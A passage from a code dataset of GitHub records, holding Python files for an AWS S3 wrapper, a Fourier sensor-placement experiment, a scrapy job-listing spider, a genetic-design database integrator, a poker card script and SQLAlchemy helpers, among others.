os\n\n# adding the pin icon to the a factory\ndef insert_factory():\n factory = gtk.IconFactory()\n os.chdir(\"icons\")\n pin_pixbuf = gtk.gdk.pixbuf_new_from_file(\"pin.png\")\n pin_iconset = gtk.IconSet(pin_pixbuf)\n factory.add('pin-icon', pin_iconset)\n factory.add_default()\n os.chdir(\"..\")\n\n#setting the pin image\ndef set_pin_image():\n pin_image = gtk.Image()\n pin_image.set_from_stock('pin-icon', gtk.ICON_SIZE_MENU) \n return pin_image\n \n \ninsert_factory()\n","repo_name":"satish28/Stickies_Pygtk","sub_path":"stickies/icons.py","file_name":"icons.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15050220947","text":"import boto3\nfrom .abstractions import CreateConnection, Listings, Uploader, Downloader\n\nclass Aws(CreateConnection, Listings, Uploader, Downloader):\n \n def create_client(self, bucket_name, object_name, region, aws_access_key_id, aws_secret_access_key):\n self.bucket_name = bucket_name\n self.object_name = object_name\n\n try:\n self.client = boto3.client('s3',\n region_name=region,\n aws_access_key_id=aws_access_key_id,\n aws_secret_access_key=aws_secret_access_key\n )\n except Exception as e:\n raise Exception(f\"ERROR creating client, \" + str(e))\n \n\n return self.client\n\n def list_objects(self):\n list_of_objects = []\n response = self.client.list_objects_v2(\n Bucket=self.bucket_name,\n MaxKeys=10000\n )\n for k,v in response.items():\n if k == \"Contents\":\n #print(k,v)\n for value in v:\n 
list_of_objects.append(value['Key'])\n\n return list_of_objects\n\n def download_objects(self):\n for object_name in self.object_name:\n try:\n self.client.download_file(self.bucket_name, object_name, object_name)\n except Exception as e:\n raise Exception(f\"ERROR downloading object(s) from bucket {self.bucket_name}, \" + str(e))\n \n def upload_objects(self):\n for object_name in self.object_name:\n try:\n self.client.upload_file(object_name, self.bucket_name, object_name)\n except Exception as e:\n raise Exception(f\"ERROR uploading object to bucket {self.bucket_name}, \" + str(e))","repo_name":"tzankov/safehaven","sub_path":"safehaven/aws_s3.py","file_name":"aws_s3.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38712329813","text":"import os\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport time\nfrom sacred import Experiment\nfrom tempfile import NamedTemporaryFile\nimport pandas as pd\n\nimport func_timeout as to\n\nimport sdsft\n\nfrom exp.ingredients import model\nfrom exp.ingredients import sensor_dataset as dataset\n\nexperiment = Experiment(\n 'training',\n ingredients=[model.ingredient, dataset.ingredient]\n)\n\n\n@experiment.config\ndef cfg():\n n_samples = 10000 #number of samples for computing the error estimates\n timeout = 144*3600 # 144 h timeout\n card_max = 40 #maximal cardinality for the greedy optimization\n\n\n@experiment.automain\ndef run(n_samples, card_max, timeout, _run, _log):\n\n result = {}\n # Get data\n s, n = dataset.get_instance()\n # Get model\n ft = model.get_instance(n)\n try: \n start = time.time()\n estimate = to.func_timeout(timeout, ft.transform, args=[s])\n end = time.time()\n gt_vec, est_vec = sdsft.eval_sf(s, estimate, n, n_samples = n_samples, err_type='raw')\n rel = np.linalg.norm(gt_vec - est_vec)/np.linalg.norm(gt_vec)\n mae = np.mean(np.abs(gt_vec - est_vec))\n inf = np.linalg.norm(gt_vec - est_vec, ord=np.inf) \n\n n_queries = s.call_counter\n t = end-start\n result['rel'] = result.get('rel', []) + [rel]\n result['mae'] = result.get('mae', []) + [mae]\n result['n_queries'] = result.get('n_queries', []) + [n_queries]\n result['time'] = result.get('time', []) + [t]\n result['freqs'] = result.get('freqs', []) + [estimate.freqs.tolist()]\n result['coefs'] = result.get('coefs', []) + [estimate.coefs.tolist()]\n print('mae %f, rel %f, n_q %d, t %f'%(mae, rel, n_queries, t), end='\\r')\n _run.log_scalar('k', len(estimate.coefs))\n \n if card_max > 0:\n values_gt = []\n values_ft = []\n values_random = []\n for card in range(0, card_max+1):\n sensors, value = sdsft.maximize_greedy(s, n, card)\n sensors_ft, _ = sdsft.maximize_greedy(estimate, n, card)\n value_ft = s(sensors_ft)[0]\n values_gt += [value]\n values_ft += [value_ft]\n perm = np.random.permutation(n)\n ind = np.zeros(n, dtype=np.bool)\n ind[perm[:card]] = True\n values_random += [s(ind)[0]]\n\n with NamedTemporaryFile(suffix='.pdf', delete=False) as f:\n plt.plot(values_gt, label='gt')\n plt.plot(values_ft, label='Fourier')\n plt.plot(values_random, label='random')\n plt.legend()\n plt.xlabel('cardinality constraint')\n plt.ylabel('information gain')\n plt.xlim(0, card_max)\n plt.ylim(bottom=0)\n plt.savefig(f.name, format='pdf')\n plt.close()\n _run.add_artifact(f.name, 'constrained_maximization.pdf')\n\n with NamedTemporaryFile(suffix='.csv', delete=False) as f:\n df = pd.DataFrame({\"cards\":np.arange(card_max+1), \"gt\": values_gt, \n 
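[Editor's note] The aws_s3.py record above passes `MaxKeys=10000` to `list_objects_v2`, but S3 returns at most 1,000 keys per response regardless, so larger buckets are silently truncated. A paginator handles the continuation tokens; the bucket name below is a placeholder:

```python
import boto3

def list_all_keys(client, bucket_name):
    """Yield every key in the bucket; each page holds at most 1,000 objects."""
    paginator = client.get_paginator("list_objects_v2")
    for page in paginator.paginate(Bucket=bucket_name):
        for obj in page.get("Contents", []):   # "Contents" is absent on empty pages
            yield obj["Key"]

# client = boto3.client("s3", region_name="us-east-1")  # credentials as in the record
# keys = list(list_all_keys(client, "my-bucket"))       # "my-bucket" is hypothetical
```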
\"fourier\": values_ft, \"random\":values_random})\n df.to_csv(f.name, index=False, sep=',', decimal='.')\n _run.add_artifact(f.name, 'log_det.csv')\n\n except to.FunctionTimedOut:\n gt_vec, est_vec = 'timeout', 'timeout'\n t = 'timeout'\n rel = 'timeout'\n mae = 'timeout'\n n_queries = 'timeout'\n inf = 'timeout'\n\n result['rel'] = result.get('rel', []) + [rel]\n result['mae'] = result.get('mae', []) + [mae]\n result['n_queries'] = result.get('n_queries', []) + [n_queries]\n result['time'] = result.get('time', []) + [t]\n result['freqs'] = result.get('freqs', []) + ['timeout']\n result['coefs'] = result.get('coefs', []) + ['timeout']\n print('%d seconds timeout reached'%timeout, end='\\r')\n \n \n \n _run.log_scalar('rel', rel)\n _run.log_scalar('mae', mae)\n _run.log_scalar('n_queries', n_queries)\n _run.log_scalar('time', t)\n _run.log_scalar('inf', inf)\n \n return result\n","repo_name":"wendlerc/aaai-ssft","sub_path":"exp/run_sensorplacement.py","file_name":"run_sensorplacement.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"42734598043","text":"def solution(m, n, puddles):\n answer = 0\n\n #지도 그리기 0으로\n p_map = [[0 for i in range(0, m+1)] for j in range(n+1)]\n p_map[1][1] = 1\n\n #윗줄부터 합 구해가기\n for i in range(1, n+1):\n for j in range(1, m+1):\n if [j,i] not in puddles:\n p_map[i][j] += (p_map[i-1][j] + p_map[i][j-1])\n\n return p_map[n][m] % 1000000007\n\nprint(solution(4, 3, [[2,2]]))\n","repo_name":"iso11/programmers","sub_path":"Dynamic_Programming/lessons42898.py","file_name":"lessons42898.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31057945758","text":"import pandas as pd\r\nimport psycopg2\r\nimport os\r\n\r\npassword = os.environ['DB_PASS']\r\nuser = os.environ['DB_USER_NAME']\r\nhost = os.environ['DB_HOST']\r\nname = os.environ['DB_NAME']\r\nport = 5432\r\n\r\nclass DataModel(object):\r\n def __init__(self):\r\n self.conn = psycopg2.connect(dbname=name, host=host,\r\n password=password,user=user)\r\n self.cur = self.conn.cursor()\r\n self.categories = ['cleanser','serum','moisturizer']\r\n self.concerns = []\r\n self.product_list = []\r\n #self.df_columns = ['price','asin','imageurl','category','title','linkurl','confidence'] #columns from table. Will add the concerns when making select statement\r\n self.instruction_dictionary = {'moisturizer':'Moisturizers are the last product to be applied at night and applied before sunscreen during the day. \\\r\n They have different consistencies depending on which base ingredients were used (called emollients).\\\r\n Moisturizers are meant to sit on the surface of the skin as an added barrier against antioxidants, sun, and pollutants.',\r\n 'serum':'Serums are applied one to two times per day after cleansing and toning. \\\r\n Serums give you the most bang for your buck with active ingredients in smaller molecules meant to penetrate the skin.\\\r\n Use a drop or two for the entire face and neck, rubbing in circles as it absorbs into the skin. \\\r\n Using serums increases the strength of your beauty regimen and provide a more comprehensive \\\r\n approach by including more than one serum in your routine.',\r\n 'cleanser':'Cleansing is the first step in your beauty regimen. \\\r\n Wash your face and neck in the morning and evening. 
\\\r\n Cleansers are for washing dirt and makeup away.\\\r\n It is important to pick good ingredients that are free of harsh chemicals and parabens.\\\r\n Ingredients in cleansers do not penetrate the skin.',\r\n 'peel/mask':'Masks and peels are applied to the skin once or twice a week. \\\r\n They contain a high concentration of active ingredients dissolved in solvents and meant to penetrate the skin. \\\r\n Masks and peels provide an added boost to your daily routine by leaving the ingredients on your skin for a longer period of time. \\\r\n Like serums, you can use more than one during the week to round out your routine. \\\r\n Apply after cleansing and toning and before serum and moisturizer,\\\r\n leave on for 5-15 minutes before washing or peeling off (depending on the product). ',\r\n 'toner':'Toners complete the cleansing of your skin by removing any impurities or oils that are still lingering after cleansing. \\\r\n There are several types of toners that address different skin types: hydrating for dry skin, stringent for oily skin, and \\\r\n calming for sensitive. They help balance the skin and increase absorption of ingredients in subsequent products. \\\r\n After cleansing in the morning and evening, saturate two cotton pads and use on your face, neck, and decolletage.',\r\n 'exfoliant':'Exfoliants brighten the skin, encourage new growth and prevent clogged pores by removing the top layer of dead cells. \\\r\n Use natural ingredients that remove the skin gently, staying away from plastic microbeads (such as polyethylene), \\\r\n harsh chemicals (such as DBP, BHA/BHT, and Triclosan), and silicones. Exfoliants can be used daily if gentle enough but \\\r\n should be used at least once or twice a week. Apply after cleansing and toners and before masks/peels, serums, and treatments. \\\r\n Use according the instructions, some exfoliants are left on while others are gently rubbed on skin and washed away with water.',\r\n 'treatment':'Treatments are the heavy duty line of defense for addressing concerns. If you use serums and masks regularly but are looking for \\\r\n something extra on a special occasion or for the occasional, transient concern, you can try a treatment. They have a higher \\\r\n concentration of ingredients that can produce an immediate, temporary effect or to boost the effectiveness of your beauty regimen.\\\r\n Use according to instructions once or twice a week.'}\r\n\r\n self.script_dictionary = {'moisturizer':'Important for all day defense against free radicals and environmental damage.', \r\n 'cleanser': 'A good cleanser is essential for removing dirt and pollutants from your skin.',\r\n 'toner': 'Prep your skin with a hydrating toner to help subsequent products infuse better.',\r\n 'exfoliant': 'Remove dead skin cells and dirt once or twice a week to give you an added glow.',\r\n 'mask': 'The second line of defense for your skin concerns. Use with serum to see the biggest effect.',\r\n 'peel': 'Refines your skin by removing the top epidermal layer.',\r\n 'treatment': 'Use for an intense, targeted approach for specific concerns to round out your routine.',\r\n 'serum': 'The most corrective for your biggest concerns. 
Include more than one into your routine to address all concerns.'\r\n }\r\n\r\n def import_data(self):\r\n query = '''\r\n SELECT m.*, p.price, p.title, p.imageurl, p.numberreviews, p.confidence\r\n FROM combined_aoc as m\r\n JOIN productinfo as p\r\n ON m.asin=p.asin\r\n '''\r\n\r\n self.df = pd.read_sql_query(query,self.conn)\r\n\r\n\r\n def _create_instruction_dictionary(self):\r\n get_instructions = '''SELECT *\r\n FROM instructions'''\r\n self.cur.execute(get_instructions)\r\n rows = self.cur.fetchall()\r\n #print('rows of instructions = ',rows)\r\n for row in rows:\r\n self.instruction_dictionary[row[0]] = row[1].encode('utf-8')\r\n \r\n def get_recommendations(self,concerns):\r\n '''input: list of concerns\r\n return: product_list = list of product dictionaries\r\n [\r\n {concern1:product_total(double precision),\r\n concern2:product_total(double precision),\r\n etc,\r\n asin: text,\r\n title:text,\r\n imageurl:text,\r\n price:double precision,\r\n category:text,\r\n confidence: double precision}\r\n ]\r\n \r\n '''\r\n self.concerns = concerns\r\n self.import_data()\r\n self.product_list.extend(self.df.to_dict(orient='records'))\r\n\r\n return(self.product_list)\r\n","repo_name":"keri/personalized_skin_care","sub_path":"website/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43552584185","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom job.items import JobItem\n\nclass A51jobSpider(scrapy.Spider):\n name = '51job'\n allowed_domains = ['zhipin.com']\n start_urls = ['https://www.zhipin.com/c101010100/?query=python&page=1']\n\n def parse(self, response):\n body = response.css(\".job-primary\")\n for head in body:\n item = JobItem()\n item[\"title\"] = head.css(\".job-title::text\").extract()[0]\n item[\"wage\"] = head.css(\".red::text\").extract()[0]\n item[\"site\"] = head.css(\".info-primary p::text\").extract()[0]\n item[\"name\"] = head.css(\".company-text .name a::text\").extract()[0]\n item[\"expert\"] = head.css(\".info-primary p::text\").extract()[1]\n item[\"edu\"] = head.css(\".info-primary p::text\").extract()[2]\n yield item\n\n # 翻页\n next_page = response.css(\".page .next::attr(href)\").extract()[0]\n if next_page is not None:\n yield response.follow(\"https://www.zhipin.com\" + next_page,callback=self.parse)\n\n\n\n\n\n\n","repo_name":"MiniOK/job","sub_path":"job/job/spiders/a51job.py","file_name":"a51job.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11372627891","text":"from abc import ABC, abstractmethod\nimport re\nfrom rdflib import URIRef, RDF, DCTERMS\nfrom app.converter.utility.identifiers import identifiers as ids\nfrom app.converter.utility.common import map_to_nv, get_interaction_properties\nfrom app.graph.utility.model.model import model\nfrom app.graph.utility.graph_objects.edge import Edge\n\nnv_role = model.identifiers.predicates.role\nnv_characteristic = model.identifiers.predicates.hasCharacteristic\nphysical_entity = model.identifiers.roles.physical_entity\nr_interaction = model.identifiers.roles.interaction\np_synonym = model.identifiers.external.synonym\np_similar = model.identifiers.external.similar_to\no_interaction = model.identifiers.objects.interaction\n\nunusable_bl = [\"coming soon\",\"coming soon...\",\"tba\"]\ntrash_bl = [\"test\"]\n\nclass AbstractDatabase(ABC):\n def 
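[Editor's note] The a51job spider record above uses `extract()[0]` (which raises `IndexError` on the last page, where there is no "next" link) and hand-prepends the domain even though `response.follow` resolves relative hrefs itself. A sketch of the same spider with those two points addressed:

```python
import scrapy

class JobsSpider(scrapy.Spider):
    name = "jobs"
    start_urls = ["https://www.zhipin.com/c101010100/?query=python&page=1"]

    def parse(self, response):
        for job in response.css(".job-primary"):
            yield {
                "title": job.css(".job-title::text").get(),  # .get() -> None when missing
                "wage": job.css(".red::text").get(),
            }
        # response.follow resolves the relative href itself; no manual domain prefix.
        next_page = response.css(".page .next::attr(href)").get()
        if next_page:
            yield response.follow(next_page, callback=self.parse)
```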
__init__(self,graph,miner,aligner):\n self._graph = graph\n self._miner = miner\n self._aligner = aligner\n\n @abstractmethod\n def build(self):\n pass\n\n @abstractmethod\n def integrate(self,graph,threshold,existing_seqs=None,existing_ints=None,existing_non_dna=None):\n model_roots = model.get_base_class()\n o_type_map = {}\n if existing_seqs is None:\n existing_seqs = {}\n if existing_ints is None:\n existing_ints = {}\n if existing_non_dna is None:\n existing_non_dna = {}\n dups = []\n sims = []\n dup_i = []\n for cd in graph.get_component_definitions():\n cd_types = graph.get_types(cd)\n if ids.roles.DNARegion in cd_types or ids.roles.DNA in cd_types:\n cd_seq = graph.get_sequences(cd)\n assert(len(cd_seq) == 1)\n cd_seq = cd_seq[0].lower()\n if cd_seq in existing_seqs:\n graph.replace_component_definition(cd,existing_seqs[cd_seq])\n self._graph.synonyms.positive(existing_seqs[cd_seq],cd)\n dups.append((existing_seqs[cd_seq],cd))\n continue\n o_type_map = self._add_cd(cd,graph,cd_types,model_roots,o_type_map)\n highest_score = [0,None]\n for k,v in existing_seqs.items():\n score = self._aligner.sequence_match(k,cd_seq)\n if score > highest_score[0]:\n highest_score = [score,v]\n if highest_score[0] > threshold:\n sims.append((highest_score[1],cd))\n self._graph.derivatives.positive(highest_score[1],cd,highest_score[0])\n existing_seqs[cd_seq] = cd\n else:\n cd_name = self._get_name(cd)\n for e,e_types in existing_non_dna.items():\n if len(list(set(e_types) & set(cd_types))) == 0:\n continue\n name = self._get_name(e)\n if cd_name in name or name in cd_name:\n self._graph.synonyms.positive(e,cd)\n dups.append((e,cd))\n break\n else:\n o_type_map = self._add_cd(cd,graph,cd_types,model_roots,o_type_map)\n existing_non_dna[cd] = cd_types\n \n for i in graph.get_interactions():\n i_type = graph.get_types(i)\n e_parts = []\n for p in graph.get_participants(interaction=i):\n p_role = graph.get_roles(p)\n assert(len(p_role) == 1)\n fc = graph.get_participant(p)\n fc_def = graph.get_definition(fc)\n e_parts.append(f'{p_role[0]}{fc_def}')\n \n assert(len(i_type) == 1)\n i_type = i_type[0]\n if i_type in existing_ints:\n for i_parts in existing_ints[i_type]:\n if e_parts == i_parts:\n dup_i.append(i)\n break\n else:\n self._add_interaction(i,graph,model_roots,o_type_map)\n existing_ints[i_type] += [e_parts]\n else:\n self._add_interaction(i,graph,model_roots,o_type_map)\n existing_ints[i_type] = [e_parts]\n \n print(len(dups),len(sims))\n print(\"Duplicates:\")\n for d in dups:\n print(d)\n print(\"Similars:\")\n for e in sims:\n print(e)\n print(\"Redundant Interactions:\")\n for i in dup_i:\n print(i)\n return existing_seqs,existing_ints,existing_non_dna\n\n \n def _add_cd(self,cd,s_graph,cd_types,m_roots,type_map):\n properties = ([(nv_characteristic, physical_entity)] +\n [(nv_role, r) for r in (s_graph.get_roles(cd) + cd_types)])\n s, p, o = map_to_nv(cd, properties, m_roots, model)\n sequence = s_graph.get_sequence_names(cd)\n if len(sequence) > 0:\n assert(len(sequence) == 1)\n props = {model.identifiers.predicates.hasSequence: sequence[0]}\n else:\n props = None\n n = self._add_node(s_graph,s, o, props)\n type_map[s] = o\n for s,p,o in s_graph.search((cd,[p_synonym,p_similar],None)):\n o = self._add_node(s_graph,o)\n self._graph.synonyms.positive(n,o)\n return type_map\n\n\n def _add_interaction(self,i,s_graph,m_roots,type_map):\n roles = ([(nv_characteristic, r_interaction)] +\n [(nv_role, r) for r in (s_graph.get_types(i))])\n s, p, o = map_to_nv(i, roles, m_roots, model)\n if o == 
o_interaction:\n return\n n = self._add_node(s_graph,s, o)\n for s, p, o in get_interaction_properties(i, o, type_map, model, s_graph,add_nv_props=False):\n if p == RDF.type:\n s = self._add_node(s_graph,s, o)\n else:\n s = self._add_node(s_graph,s)\n o = self._add_node(s_graph,o)\n self._add_edge(s_graph,s, o, p)\n\n\n def _add_node(self,graph,name, type=None, props=None):\n properties = self._get_properties(name, graph)\n if props is not None:\n properties.update(props)\n neo = self._graph.add_node(name,type,**properties)\n return neo\n\n\n def _add_edge(self,graph,n, v, e):\n properties = self._get_properties(e, graph)\n self._graph.add_edges(Edge(n,v,str(e),**properties),5)\n\n\n def _get_properties(self,entity, graph):\n properties = {}\n meta = graph.get_metadata(entity)\n properties[\"name\"] = self._get_name(entity)\n if len(meta) > 0:\n properties[DCTERMS.description] = meta\n return properties\n\n\n def _replace_cd(sel,graph,replacer,replaced):\n graph.remove_triple((replaced,ids.predicates.title,None)) \n for sa in graph.get_sequence_annotations(replaced):\n graph.remove_sequence_annotation(sa)\n for seq in graph.get_sequence_names(replaced):\n graph.remove_sequence(seq)\n graph.replace_component_definition(replaced,replacer)\n graph.add_synonym(replacer,replaced)\n return graph\n\n\n def _is_trash(self,metadata,sequence):\n if len(sequence) != 1:\n return True\n if len(sequence[0]) < 2:\n return True\n if any(ext in trash_bl for ext in metadata):\n return True\n if any(ext in unusable_bl for ext in metadata):\n return True\n return False\n \n\n def _prune_sbol_predicates(self,graph):\n preds = [\n \"toplevel\",\n \"ownedby\",\n \"created\",\n \"was_generated_by\",\n \"ended_at_time\",\n \"had_plan\",\n \"entity\",\n \"qualified_association\",\n \"qualified_usage\",\n \"agent\",\n \"model\",\n \"bookmark\",\n \"star\",\n \"modified\",\n \"owning_group_id\",\n \"dominant\",\n \"creator\",\n \"wasDerivedFrom\",\n \"bookmark\",\n \"m_user_id\",\n \"group_u_list\",\n \"owner_id\",\n \"status\",\n \"sampleStatus\",\n \"experience\",\n \"direction\",\n \"igdirection\",\n \"partStatus\",\n \"discontinued\"]\n prune_preds = [(None,getattr(ids.predicates,p),None) for p in preds]\n for triple in prune_preds:\n graph.remove_triple(triple)\n return graph\n \n\n def _prune_sbol_objects(self,graph):\n pruned_objs = [ids.objects.collection,\n ids.objects.attachment,\n ids.objects.model,\n ids.objects.activity,\n ids.objects.usage,\n ids.objects.association,\n ids.objects.agent,\n ids.objects.plan]\n for s,p,o in graph.search((None,RDF.type,pruned_objs)):\n graph.remove_triple((s,None,None))\n return graph\n \n\n def _handle_component_definition(self,graph,cd,seqs):\n md = graph.get_metadata(cd)\n sequence = graph.get_sequences(cd)\n if self._is_trash(md,sequence):\n return None,seqs\n if self._has_components(cd,graph):\n return None,seqs\n graph = self._prune_sbol_predicates(graph)\n graph = self._prune_sbol_objects(graph)\n seq = graph.get_sequences(cd)\n assert(len(seq) == 1)\n seq = seq[0]\n if seq in seqs:\n graph = self._replace_cd(graph,URIRef(seqs[seq]),cd)\n else:\n seqs[seq] = cd\n return graph,seqs\n\n\n def _has_components(self,subject,graph):\n component_roles = [\n ids.roles.promoter,\n ids.roles.rbs,\n ids.roles.cds,\n ids.roles.terminator,\n ids.roles.igem_promoter,\n ids.roles.igem_rbs,\n ids.roles.igem_cds,\n ids.roles.igem_terminator,\n ids.roles.igem_protein]\n # IGEM -> SBH has some components as annotations \n # which should be components. 
They have roles such as CDS.\n instance_count = 0\n for c in graph.get_components(subject):\n c_def = graph.get_definition(c)\n roles = graph.get_roles(c_def)\n if len(list(set(roles) & set(component_roles))) > 0:\n instance_count += 1\n if instance_count > 1:\n return True\n \n for sa in graph.get_sequence_annotations(subject):\n roles = graph.get_roles(sa)\n if len(list(set(roles) & set(component_roles))) > 0:\n instance_count += 1\n if instance_count > 1:\n return True\n return False\n \n\n def _replace(self,graph,i,p_part,fc,cts,role):\n a_parts = graph.get_participants(interaction=i)\n a_parts.remove(p_part)\n assert(len(a_parts) == 1)\n a_parts = a_parts[0]\n assert(role in cts)\n for entity in cts[role]:\n name = self._get_name(entity)\n if name in p_part:\n replacement = entity\n break\n else:\n raise ValueError()\n #replacement = cts[_get_input(str,cts[role])]\n md = graph.get_module_definition(interaction=i)\n fc_n = graph.create_fc_name(md,replacement)\n graph.add_functional_component(fc_n,replacement,md)\n graph.replace_triple((p_part,ids.predicates.participant,fc),\n (p_part,ids.predicates.participant,fc_n))\n return graph\n \n\n def _role_intersection(self,r1s,r2s):\n if len(r1s) > 0 and len(r2s) > 0 and len(list(set(r1s) & set(r2s))) == 0:\n return True\n return False\n \n\n def _get_name(self,subject):\n split_subject = _split(subject)\n if len(split_subject[-1]) == 1 and split_subject[-1].isdigit():\n return split_subject[-2]\n elif len(split_subject[-1]) == 3 and _isfloat(split_subject[-1]):\n return split_subject[-2]\n else:\n return split_subject[-1]\n\n\ndef _split(uri):\n return re.split('#|\\/|:', uri)\n\n\ndef _isfloat(x):\n try:\n float(x)\n return True\n except ValueError:\n return False","repo_name":"intbio-ncl/genet2","sub_path":"app/enhancer/seeder/datasets/abstract_dataset.py","file_name":"abstract_dataset.py","file_ext":"py","file_size_in_byte":12247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42967568369","text":"import random\n\ncards = ['2:', '3:', '4:', '5:', '6:', '7:', '8:', '9:', '10:', 'J:', 'Q:', 'K:', 'A:']\nsuites = ['♥', '♠', '♣', '♦']\ncard_stack = []\ndesk = {}\nhand = {}\n\ndef cards_defined():\n\n def random_card():\n random_card = random.choice(cards) + random.choice(suites)\n return random_card\n\n def duplicate_check(arg_list):\n for element in arg_list:\n if element == element:\n arg_list.remove(element)\n card_stack.append(random_card())\n\n for _ in range(7):\n card_stack.append(random_card())\n duplicate_check(card_stack)\n\n #desk.extend(card_stack[0:5])\n #hand.extend(card_stack[5:7])\n\n\n\n\ndef cards_choose(call):\n if 'init_flop' in call:\n return card_stack[0:3]\n elif 'init_turn' in call:\n return card_stack[3]\n elif 'init_river' in call:\n return card_stack[4]\n elif 'give_hand' in call:\n return card_stack[5:7]\n\n\n\ncards_defined()\n\ndef combination_check():\n pass\n\n\nprint(cards_choose('init_flop'))\nprint(cards_choose('init_turn'))\nprint(cards_choose('init_river'))\nprint(cards_choose('give_hand'))\n\n\n\n\n\n","repo_name":"beshu/PokerPython","sub_path":"combinations.py","file_name":"combinations.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29578346140","text":"from sqlalchemy import select, func\n\nfrom models import engine\nfrom models import user_table, User, operation_table, Operation, task_table\nfrom sqlalchemy.orm import 
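[Editor's note] In the combinations.py record above, `duplicate_check` tests `element == element` (always true) and mutates the list while iterating, so it strips cards rather than removing duplicates. Sampling without replacement from the full rank x suit product makes duplicates impossible in the first place; a minimal sketch:

```python
import itertools
import random

cards = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']
suites = ['♥', '♠', '♣', '♦']

# Build all 52 distinct card strings, then sample without replacement:
# no duplicates can occur, so no post-hoc duplicate check is needed.
deck = [rank + ':' + suit for rank, suit in itertools.product(cards, suites)]
card_stack = random.sample(deck, 7)

flop, turn, river, hand = card_stack[0:3], card_stack[3], card_stack[4], card_stack[5:7]
print(flop, turn, river, hand)
```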
sessionmaker\n\nSession = sessionmaker(bind=engine)\n\ndef create_user(login: str, password: str) -> User:\n user = User()\n user.login = login\n user.password = password\n return user\n\ndef create_operation(user_id: int, task_id: int, input: str, input_name: str, result: str, result_name: str) -> Operation:\n operation = Operation()\n operation.user_id = user_id\n operation.task_id = task_id\n operation.input = input\n operation.input_name = input_name\n operation.result = result\n operation.result_name = result_name\n return operation\n\ndef select_from_table(query):\n with engine.connect() as connection:\n return connection.execute(query)\n\ndef find_user_by_login(login:str):\n result = select_from_table(select(user_table).where(user_table.c.login == login))\n return [_ for _ in result]\n\ndef get_operation_number():\n result = select_from_table(select([func.count()]).select_from(operation_table))\n return [_ for _ in result][0][0]\n\ndef add_user(user: User):\n s = Session()\n s.bulk_save_objects([user])\n s.commit()\n with engine.connect() as connection:\n res = [n for n in connection.execute(user_table.select())]\n return res[-1][0]\n\ndef add_operation(operation: Operation):\n s = Session()\n s.bulk_save_objects([operation])\n s.commit()\n\ndef get_task_translate_by_id(task_id: int):\n result = select_from_table(select(task_table.c.name).where(task_table.c.id == task_id))\n return [_ for _ in result][0][0]\n\ndef select_operations_by_user(user):\n result = select_from_table(select(task_table.c.name, operation_table.c.input, operation_table.c.input_name,\n operation_table.c.result, operation_table.c.result_name)\n .join_from(operation_table, task_table, operation_table.c.task_id == task_table.c.id)\n .where(operation_table.c.user_id == user))\n return [_ for _ in result]","repo_name":"V31R/V31R.github.io","sub_path":"backend/server/database_api.py","file_name":"database_api.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9911317669","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport re\n\nfrom DataFixed import DataFixed\nfrom ConfidenceLevel import ConfidenceLevel\nfrom utils import StrUtil\n\nclass NameDataFixed(DataFixed):\n \"\"\"description of class\"\"\"\n\n def __init__(self):\n DataFixed.__init__(self, u'Name')\n self.__ErrorCount__ = 0\n self.__FixedCount__ = 0\n\n\n def __BeforeFixed__(self):\n logging.info(u'Start Fixed Name Data=================>\\n')\n\n\n def __FixedData__(self, resultJson):\n names = self.__ParseData__(resultJson)\n if len(names) == 0:\n logging.info(u'Name Data Error')\n return ConfidenceLevel.Bad, ''\n\n logging.info(names[0] + u' Fixed To ')\n \n confidencelevel, name = self.__FixedNameData__(names)\n\n logging.info(name)\n\n return confidencelevel, name\n\n\n def __FixedDataWithValidate__(self, resultJson, validateJson):\n name_list = self.__ParseData__(resultJson)\n validated_name_list = self.__ParseData__(validateJson)\n\n if len(validated_name_list) == 0 or len(name_list) == 0 or not self.__CheckData__(validated_name_list[0]):\n logging.info(u'Validated Data Error')\n return\n\n if validated_name_list[0] != name_list[0]:\n self.__ErrorCount__ += 1\n else:\n logging.info(u'Validated Equal To Result')\n return\n\n logging.info(u'Validated Not Equal To Result')\n logging.info(name_list[0] + u' Fixed To ')\n \n confidencelevel, checkcode, checkcodecandidates = self.__CheckData__(name_list)\n\n logging.info(checkcode)\n\n if 
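[Editor's note] The database_api.py record above mixes query styles: `select(user_table)` (1.4/2.0 style) next to `select([func.count()])` (legacy 1.x list form). On SQLAlchemy 1.4+ the bracket-less form covers both cases; a runnable sketch against an in-memory SQLite stand-in for the record's engine:

```python
from sqlalchemy import (create_engine, MetaData, Table, Column, Integer,
                        String, select, func)

engine = create_engine("sqlite://")          # in-memory stand-in for the record's engine
metadata = MetaData()
user_table = Table("user", metadata,
                   Column("id", Integer, primary_key=True),
                   Column("login", String))
metadata.create_all(engine)

with engine.begin() as connection:           # begin() commits on exit
    connection.execute(user_table.insert().values(login="alice"))
    # 1.4+/2.0 style: positional column expressions, no list wrapper.
    count = connection.execute(
        select(func.count()).select_from(user_table)
    ).scalar_one()
    row = connection.execute(
        select(user_table).where(user_table.c.login == "alice")
    ).first()

print(count, row)
```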
